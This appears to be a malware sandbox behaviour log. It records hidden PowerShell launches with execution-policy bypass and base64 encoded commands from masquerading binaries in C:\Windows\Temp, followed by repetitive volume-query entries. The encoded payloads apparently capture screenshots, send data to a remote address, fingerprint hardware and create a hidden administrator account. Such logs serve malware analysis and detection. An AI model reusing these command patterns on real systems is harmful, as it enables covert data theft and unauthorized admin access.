Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -w hidden -nologo -nop -ep bypass -encodedcommand qqbkagqalqbuahkacablacaalqbbahmacwblag0aygbsahkatgbhag0azqagafmaeqbzahqazqbtac4avwbpag4azabvahcacwauaeyabwbyag0acwa7acaawwbtahkacwb0aguabqauafcaaqbuagqabwb3ahmalgbgag8acgbtahmalgbtagmacgblaguabgbdadoaogbbagwababtagmacgblaguabgbzacaafaagaeyabwbyaeuayqbjaggalqbpagiaagblagmadaagahsaiaaiacqakaakaf8algbcag8adqbuagqacwauafcaaqbkahqaaaapahgajaaoacqaxwauaeiabwb1ag4azabzac4asablagkazwboahqakqaiacaafqagahwaiabpahuadaataeyaaqbsaguaiaataeyaaqbsaguauabhahqaaaagaciaqwa6afwavwbpag4azabvahcacwbcafqazqbtahaaxabkahaaiga=
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden -encodedcommand "uwb0ageacgb0ac0auabyag8aywblahmacwagahaabwb3aguacgbzaggazqbsagwaiaatafcaaqbuagqabwb3afmadab5agwazqagaggaaqbkagqazqbuacaalqbbahiazwb1ag0azqbuahqatabpahmadaagacialqbxagkabgbkag8adwbtahqaeqbsaguaiabiagkazabkaguabgaiacwaiaaiac0atgbvaewabwbnag8aigasacaaigatae4abwbqahiabwbmagkabablacialaagacialqbfahgazqbjahuadabpag8abgbqag8ababpagmaeqagaeiaeqbwageacwbzacialaagacialqbfag4aywbvagqazqbkaemabwbtag0ayqbuagqaiabtafeaqgbgaeeargbnaeeasqbbaeeabwbbaeyacwbbafyaqqbcaeyaqqbgagcaqqbkaeeaqqb1aeearqbvaeeaygbnaeiaagbbaeuaoabbafiaqqbcahaaqqbhadqaqqbsahcaqgbkaeearabvaeeatwbnaeiavgbbaeyauqbbafiazwbbadqaqqbdadqaqqbsahcaqgbsaeeargbraeeavqb3aeiamabbaeyasqbbafmauqbcae8aqqbhagmaqqblaeeaqqbvaeearqbraeeazab3aeiaeqbbaemaqqbbaesaqqbcagiaqqbgae0aqqblafeaqgb6aeeasabraeeawgbraeiadabbaemanabbafyaqqbcagwaqqbiagcaqqbkaeeaqqb1aeearqbvaeeaygbnaeiaagbbaecaoabbafoaqqbcahaaqqbhadqaqqbaahcaqgbkaeearabvaeeatwbnaeiavgbbaeyauqbbafiazwbbadqaqqbdadqaqqbsahcaqgbsaeeasabraeeavqb3aeiamabbaegasqbbageauqbcahuaqqbhagmaqqblaeeaqgbiaeearqbnaeeaygb3aeiadqbbaegawqbbafoauqbcahkaqqbiafeaqqbyafeaqqa2aeearabvaeeaugbnaeiaeqbbaecaoabbagiauqbcaemaqqbhaeuaqqbjahcaqgbsaeearabzaeeatgbbaeiavabbaegauqbbagmazwbcahaaqqbhadqaqqbaahcaqqbvaeeaqwbjaeeawqbraeiasqbbaeyasqbbae0aqqbcagoaqqbfagcaqqbuafeaqqayaeearqb3aeeazqbraeeanqbbaecabwbbafkazwbbahkaqqbfadqaqqbkagcaqgbpaeeargbjaeeavgbnaeeadwbbaecarqbbafiadwbbaduaqqbhahmaqqbxagcaqgbuaeearabvaeeayqb3aeiayqbbaeyatqbbae8auqbcafeaqqbgae0aqqbnaeeaqqaxaeearwawaeeasqbnaeeacabbaemaawbbaesauqbbahaaqqbdadqaqqbrahcaqgbqaeearwa0aeeavgbbaeiargbbaecanabbagqaqqbbahaaqqbdagsaqqaiaa=="	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -nologo -noprofile -executionpolicy bypass -encodedcommand sqbfafgaiaaoafsavabfafgadaauaeuabgbjae8arabpag4arwbdadoaogbvafqarga4ac4arwblafqauwb0afiasqboagcakaaoaekadwbyacaakabbafmaeqbzahqazqbtac4avablahgadaauaeuabgbjag8azabpag4azwbdadoaogbvafqarga4ac4arwblahqauwb0ahiaaqbuagcakabbaemabwbuahyazqbyahqaxqa6adoargbyag8abqbcageacwbladyanabtahqacgbpag4azwaoaciayqbiafiamabjaegatqa2aewaeqa5agoaygayae4adgbiafcavgawagearwa5agsawgbtaduaawbaafmaoqbqafmamaa1ag0aigapackakqapac4aqwbpag4avabfag4adaapacka	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c start /min "" powershell.exe -windowstyle hidden -nologo -noprofile -executionpolicy bypass -encodedcommand jab1ahiaaqagad0aiaaiaggadab0ahaacwa6ac8alwbjag8aywbvag0azqb0aggabwbkagualgbkagualwbmagkababladialwa0adqamgbkadyazaayagiaygbiagyaoqa1ageamabjadiazaa5adgamwazaduaywa3agmazgaxadiazaa5agqanabhadiamqa2admaygbmagqamwazagyanaayaduanaa3agqaoabladiamqa3adyamwa0adkazgbjaduaygblagmaoqa5adkazabmadcanwblagqangbmagmamqawagmazaayagiaoabmadeaygbmadyazqaxadqamqa5ageazgbkadeayga4aguanga1adiazaa2adaaoaayadaayqa1adyazga1agqaoaa3adiayga5adgamwayagqanqa4agmazgbladyanqazadqaoabiagqayga2adeangbkagiamgazaguanaazagyanwa5adcamgbkageazgazadkamqbmadeamwbiagqangbhadyaoqbjadgaoqaxadkamaayadgamaa3ageayqbkadqamgazadyamga3adgamqaxagmaoabladaazaa0ageayqa3aguazqa5admaoqbkadcanaa1adiamaaxaguazqbkadgamaa2aguazqa5adcaoqbmageaiga7aa0acgakagmabwb1ag4adaagad0aiaaxadaamaa7aa0acganaaoadqakaa0acgbmahuabgbjahqaaqbvag4aiabtaguabgbkacaaewanaaoaiaagacaaiabwageacgbhag0akaagafsauabtae8aygbqaguaywb0af0aiaakagwabwbnae0acwbnacaakqanaaoadqakacaaiaagacaaiwagaemabwbuahyazqbyahqaiabiag8azab5acaadabvacaacwb0ahiaaqbuagcadqakacaaiaagacaajabzahqacgbpag4azwbcag8azab5acaapqagafsacwb0ahiaaqbuagcaxqaoacqababvagcatqbzagcaiab8acaaqwbvag4adgblahiadabuag8alqbkahmabwbuackaowanaaoaiaagacaaiaakagwabwbnae0azqbzahmayqbnaguacwagad0aiabaacgakqa7aa0acgagacaaiaagacqababvagcatqblahmacwbhagcazqbzacaakwa9acaajabzahqacgbpag4azwbcag8azab5adsadqakacaaiaagacaajabsag8azwbnaguacwbzageazwblahmaiaarad0aiaaiac0alqatac0alqatac0alqatac0aiga7aa0acganaaoaiaagacaaiaakaggazqbhagqazqbyahmaiaa9acaaqab7ah0aowanaaoaiaagacaaiaakagsazqb5acaapqagaciaqwbvag4adablag4adaatafqaeqbwaguaiga7aa0acgagacaaiaagacqadgbhagwadqblacaapqagaciayqbwahaababpagmayqb0agkabwbuac8aagbzag8abgaiadsadqakaa0acgagacaaiaagacqaaablageazablahiacwbbacqaawblahkaxqagad0aiaakahyayqbsahuazqa7aa0acgagacaaiaagacqadqbyagkaiaa9acaaigbmae8arwbvafiataaiadsadqakacaaiaagacaadabyahkadqakacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaakagiabwbkahkaiaa9acaajabsag8azwbnaguacwbzageazwblahmaiab8acaaqwbvag4adgblahiadabuag8alqbkahmabwbuadsadqakacaaiaagacaaiaagacaaiaagacaaiaagaekabgb2ag8aawblac0avwblagiaugblaheadqblahmadaagac0avqbyagkaiaakahuacgbpacaalqbnaguadaboag8azaagafaabwbzahqaiaataegazqbhagqazqbyahmaiaakaggazqbhagqazqbyahmaiaataeiabwbkahkaiaakagiabwbkahkadqakacaaiaagacaaiaagacaaiab9aa0acgagacaaiaagacaaiaagacaaywbhahqaywboahsadqakacaaiaagacaaiaagacaaiaagacaaiaagaa0acgagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaanaaoafqanaaoadqakahcaaabpagwazqaoacqaywbvahuabgb0acaalqbnahqaiaawackadqakahsadqakaakadqakaakadabyahkaewanaaoaiaagacaaiaagacaaiaagafmazqbuagqaiaaiagiazqbnagkabgagagqabwb3ag4ababvageazaagacqadqbyagkaiga7aa0acgajaakajabjag8abgb0aguabgb0acaapqagaekabgb2ag8aawblac0avwblagiaugblaheadqblahmadaagac0avqbyagkaiaakahuacgbpacaalqbvahmazqbcageacwbpagmauabhahiacwbpag4azwa7aa0acgagacaaiaagacaaiaagacaajabiahkadablaeeacgbyageaeqagad0aiaakagmabwbuahqazqbuahqalgbjag8abgb0aguabgb0adsadqakacaaiaagacaaiaagacaaiabmag8acgagacgajabpac	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden -nologo -noprofile -executionpolicy bypass -encodedcommand jab1ahiaaqagad0aiaaiaggadab0ahaacwa6ac8alwbjag8aywbvag0azqb0aggabwbkagualgbkagualwbmagkababladialwa0adqamgbkadyazaayagiaygbiagyaoqa1ageamabjadiazaa5adgamwazaduaywa3agmazgaxadiazaa5agqanabhadiamqa2admaygbmagqamwazagyanaayaduanaa3agqaoabladiamqa3adyamwa0adkazgbjaduaygblagmaoqa5adkazabmadcanwblagqangbmagmamqawagmazaayagiaoabmadeaygbmadyazqaxadqamqa5ageazgbkadeayga4aguanga1adiazaa2adaaoaayadaayqa1adyazga1agqaoaa3adiayga5adgamwayagqanqa4agmazgbladyanqazadqaoabiagqayga2adeangbkagiamgazaguanaazagyanwa5adcamgbkageazgazadkamqbmadeamwbiagqangbhadyaoqbjadgaoqaxadkamaayadgamaa3ageayqbkadqamgazadyamga3adgamqaxagmaoabladaazaa0ageayqa3aguazqa5admaoqbkadcanaa1adiamaaxaguazqbkadgamaa2aguazqa5adcaoqbmageaiga7aa0acgakagmabwb1ag4adaagad0aiaaxadaamaa7aa0acganaaoadqakaa0acgbmahuabgbjahqaaqbvag4aiabtaguabgbkacaaewanaaoaiaagacaaiabwageacgbhag0akaagafsauabtae8aygbqaguaywb0af0aiaakagwabwbnae0acwbnacaakqanaaoadqakacaaiaagacaaiwagaemabwbuahyazqbyahqaiabiag8azab5acaadabvacaacwb0ahiaaqbuagcadqakacaaiaagacaajabzahqacgbpag4azwbcag8azab5acaapqagafsacwb0ahiaaqbuagcaxqaoacqababvagcatqbzagcaiab8acaaqwbvag4adgblahiadabuag8alqbkahmabwbuackaowanaaoaiaagacaaiaakagwabwbnae0azqbzahmayqbnaguacwagad0aiabaacgakqa7aa0acgagacaaiaagacqababvagcatqblahmacwbhagcazqbzacaakwa9acaajabzahqacgbpag4azwbcag8azab5adsadqakacaaiaagacaajabsag8azwbnaguacwbzageazwblahmaiaarad0aiaaiac0alqatac0alqatac0alqatac0aiga7aa0acganaaoaiaagacaaiaakaggazqbhagqazqbyahmaiaa9acaaqab7ah0aowanaaoaiaagacaaiaakagsazqb5acaapqagaciaqwbvag4adablag4adaatafqaeqbwaguaiga7aa0acgagacaaiaagacqadgbhagwadqblacaapqagaciayqbwahaababpagmayqb0agkabwbuac8aagbzag8abgaiadsadqakaa0acgagacaaiaagacqaaablageazablahiacwbbacqaawblahkaxqagad0aiaakahyayqbsahuazqa7aa0acgagacaaiaagacqadqbyagkaiaa9acaaigbmae8arwbvafiataaiadsadqakacaaiaagacaadabyahkadqakacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaakagiabwbkahkaiaa9acaajabsag8azwbnaguacwbzageazwblahmaiab8acaaqwbvag4adgblahiadabuag8alqbkahmabwbuadsadqakacaaiaagacaaiaagacaaiaagacaaiaagaekabgb2ag8aawblac0avwblagiaugblaheadqblahmadaagac0avqbyagkaiaakahuacgbpacaalqbnaguadaboag8azaagafaabwbzahqaiaataegazqbhagqazqbyahmaiaakaggazqbhagqazqbyahmaiaataeiabwbkahkaiaakagiabwbkahkadqakacaaiaagacaaiaagacaaiab9aa0acgagacaaiaagacaaiaagacaaywbhahqaywboahsadqakacaaiaagacaaiaagacaaiaagacaaiaagaa0acgagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaanaaoafqanaaoadqakahcaaabpagwazqaoacqaywbvahuabgb0acaalqbnahqaiaawackadqakahsadqakaakadqakaakadabyahkaewanaaoaiaagacaaiaagacaaiaagafmazqbuagqaiaaiagiazqbnagkabgagagqabwb3ag4ababvageazaagacqadqbyagkaiga7aa0acgajaakajabjag8abgb0aguabgb0acaapqagaekabgb2ag8aawblac0avwblagiaugblaheadqblahmadaagac0avqbyagkaiaakahuacgbpacaalqbvahmazqbcageacwbpagmauabhahiacwbpag4azwa7aa0acgagacaaiaagacaaiaagacaajabiahkadablaeeacgbyageaeqagad0aiaakagmabwbuahqazqbuahqalgbjag8abgb0aguabgb0adsadqakacaaiaagacaaiaagacaaiabmag8acgagacgajabpacaapqagadaaowagac
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -nologo -noprofile -windowstyle hidden -executionpolicy bypass -encodedcommand zgb1ag4aywb0agkabwbuacaarwblahqalqbjagqazqbuahqaaqb0ahkaewakacaaiaagacaajaboageacgbkaeqacgbpahyazqbzacaapqagaecazqb0ac0avwbtagkatwbiagoazqbjahqaiaataemababhahmacwagafcaaqbuadmamgbfaeqaaqbzagsarabyagkadgblacaafaagafcaaablahiazqatae8aygbqaguaywb0acaaewagacqaxwauae0azqbkagkayqbuahkacablacaalqblaheaiaaiaeyaaqb4aguazaagaggayqbyagqaiabkagkacwbracaabqblagqaaqbhaciaiaatag8acgagacqaxwauae0azqbkagkayqbuahkacablacaalqblaheaiaaiaeyaaqb4aguazaagaggayqbyagqaiabkagkacwbracaabqblagqaaqbhacaalqagafmauwbeaciaiab9aaoajabkahiaaqb2aguasqbuagyabwbbahiacgbhahkaiaa9acaaqaaoackacgbmag8acgblageaywboacaakaakaggayqbyagqarabyagkadgblacaaaqbuacaajaboageacgbkaeqacgbpahyazqbzackaiab7aaoaiaagacaaiaakahmazqbyagkayqbsae4adqbtagiazqbyacaapqagacqaaabhahiazabeahiaaqb2agualgbtaguacgbpageababoahuabqbiaguacgakacaaiaagacaajabtag8azablagwaiaa9acaajaboageacgbkaeqacgbpahyazqauae0abwbkaguabaakacaaiaagacaajabkahiaaqb2aguasqbuagyabwagad0aiaaiafmazqbyagkayqbsacaatgb1ag0aygblahiaogagacqacwblahiaaqbhagwatgb1ag0aygblahialaagae0abwbkaguabaa6acaajabtag8azablagwaigakacaaiaagacaajabkahiaaqb2aguasqbuagyabwbbahiacgbhahkaiaarad0aiaakagqacgbpahyazqbjag4azgbvaaoafqakacqaywbvag0aygbpag4azqbkaekabgbmag8aiaa9acaajabkahiaaqb2aguasqbuagyabwbbahiacgbhahkaiaatagoabwbpag4aiaaiagaacgbgag4aigakacqaywbwahuasqbuagyabwagad0aiabhaguadaatafcabqbpae8aygbqaguaywb0acaalqbdagwayqbzahmaiabxagkabgazadiaxwbqahiabwbjaguacwbzag8acgakacqaywbwahuarablahqayqbpagwacwagad0aiaaiafaacgbvagmazqbzahmabwbyaekazaa6acaajaaoacqaywbwahuasqbuagyabwauafaacgbvagmazqbzahmabwbyaekazaapacwaiaboageabqbladoaiaakacgajabjahaadqbjag4azgbvac4atgbhag0azqapacwaiabnageaeabdagwabwbjagsauwbwaguazqbkadoaiaakacgajabjahaadqbjag4azgbvac4atqbhahgaqwbsag8aywbrafmacablaguazaapacwaiabvag4aaqbxahuazqbjagqaogagacqakaakagmacab1aekabgbmag8algbvag4aaqbxahuazqbjagqakqaiaaoajabhagwababjag4azgbvacaapqagaciajabjag8abqbiagkabgblagqasqbuagyabwbgahiayabuacqaywbwahuarablahqayqbpagwacwaiaaoajabtagqanqagad0aiaboaguadwatae8aygbqaguaywb0acaauwb5ahmadablag0algbtaguaywb1ahiaaqb0ahkalgbdahiaeqbwahqabwbnahiayqbwaggaeqauae0araa1aemacgb5ahaadabvafmazqbyahyaaqbjaguauabyag8adgbpagqazqbyaaoajabiahkadablahmaiaa9acaawwbtahkacwb0aguabqauafqazqb4ahqalgbfag4aywbvagqaaqbuagcaxqa6adoavqbuaeyaoaauaecazqb0aeiaeqb0aguacwaoacqayqbsagwasqbuagyabwapaaoajaboageacwboaeiaeqb0aguacwagad0aiaakag0azaa1ac4aqwbvag0acab1ahqazqbiageacwboacgajabiahkadablahmakqakacqaaabhahmaaaagad0aiabbaeiaaqb0aemabwbuahyazqbyahqazqbyaf0aoga6afqabwbtahqacgbpag4azwaoacqaaabhahmaaabcahkadablahmakqagac0acgblahaababhagmazqagaccalqanaaoaiaagacaaiabyaguadab1ahiabgagacqaaabhahmaaaa7aaoafqakagmazaagaciaqwa6afwavwbpag4azabvahcacwbcafqazqbtahaaiga7aaoajab0aguacwb0acaapqagaecazqb0ac0asqbkaguabgb0agkadab5adsacgakahqazqbzahqaiab8acaatwb1ahqalqbgagkabablacaalqbgagkabablafaayqb0aggaiaaiagqazqb2agkaywblaekazaauahqaeab0aciaiaataeuabgbjag8azabpag4azwagafuavabgadga
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -nologo -noprofile -windowstyle hidden -executionpolicy bypass -encodedcommand jabvahmazqbyag4ayqbtaguaiaa9acaaigbvahmazqbyadeaiga7acqacab3agqaiaa9acaaigaxadiamwa0aduanga3adgaoqahaeeamqbhaciaowagacqavqbzaguacgbqageacgbhag0acwagad0aiabaahsajwboageabqblaccaiaa9acaajabvahmazqbyag4ayqbtaguaowagaccauabhahmacwb3ag8acgbkaccaiaa9acaakabdag8abgb2aguacgb0afqabwatafmazqbjahuacgblafmadabyagkabgbnacaalqbtahqacgbpag4azwagacqacab3agqaiaataeeacwbqagwayqbpag4avablahgadaagac0argbvahiaywblackaowagaccauabhahmacwb3ag8acgbkae4azqb2aguacgbfahgacabpahiazqbzaccaiaa9acaajab0ahiadqblah0aowboaguadwataewabwbjageababvahmazqbyacaaqabvahmazqbyafaayqbyageabqbzadsajabhahiabwb1ahaauabhahiayqbtahmaiaa9acaaqab7accarwbyag8adqbwaccaiaa9acaajwbbagqabqbpag4aaqbzahqacgbhahqabwbyahmajwa7acaajwbnaguabqbiaguacganacaapqagacqavqbzaguacgbuageabqblah0aowbbagqazaataewabwbjageababhahiabwb1ahaatqblag0aygblahiaiabaaecacgbvahuacabqageacgbhag0acwa7aa0acga=
Source: C:\Windows\Temp\myRdpService.exe	Process created: C:\Windows\System32\cmd.exe /c powershell.exe -w hidden -nologo -nop -ep bypass -encodedcommand qqbkagqalqbuahkacablacaalqbbahmacwblag0aygbsahkatgbhag0azqagafmaeqbzahqazqbtac4avwbpag4azabvahcacwauaeyabwbyag0acwa7acaawwbtahkacwb0aguabqauafcaaqbuagqabwb3ahmalgbgag8acgbtahmalgbtagmacgblaguabgbdadoaogbbagwababtagmacgblaguabgbzacaafaagaeyabwbyaeuayqbjaggalqbpagiaagblagmadaagahsaiaaiacqakaakaf8algbcag8adqbuagqacwauafcaaqbkahqaaaapahgajaaoacqaxwauaeiabwb1ag4azabzac4asablagkazwboahqakqaiacaafqagahwaiabpahuadaataeyaaqbsaguaiaataeyaaqbsaguauabhahqaaaagaciaqwa6afwavwbpag4azabvahcacwbcafqazqbtahaaxabkahaaiga=
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -w hidden -nologo -nop -ep bypass -encodedcommand qqbkagqalqbuahkacablacaalqbbahmacwblag0aygbsahkatgbhag0azqagafmaeqbzahqazqbtac4avwbpag4azabvahcacwauaeyabwbyag0acwa7acaawwbtahkacwb0aguabqauafcaaqbuagqabwb3ahmalgbgag8acgbtahmalgbtagmacgblaguabgbdadoaogbbagwababtagmacgblaguabgbzacaafaagaeyabwbyaeuayqbjaggalqbpagiaagblagmadaagahsaiaaiacqakaakaf8algbcag8adqbuagqacwauafcaaqbkahqaaaapahgajaaoacqaxwauaeiabwb1ag4azabzac4asablagkazwboahqakqaiacaafqagahwaiabpahuadaataeyaaqbsaguaiaataeyaaqbsaguauabhahqaaaagaciaqwa6afwavwbpag4azabvahcacwbcafqazqbtahaaxabkahaaiga=

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.mshtml.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
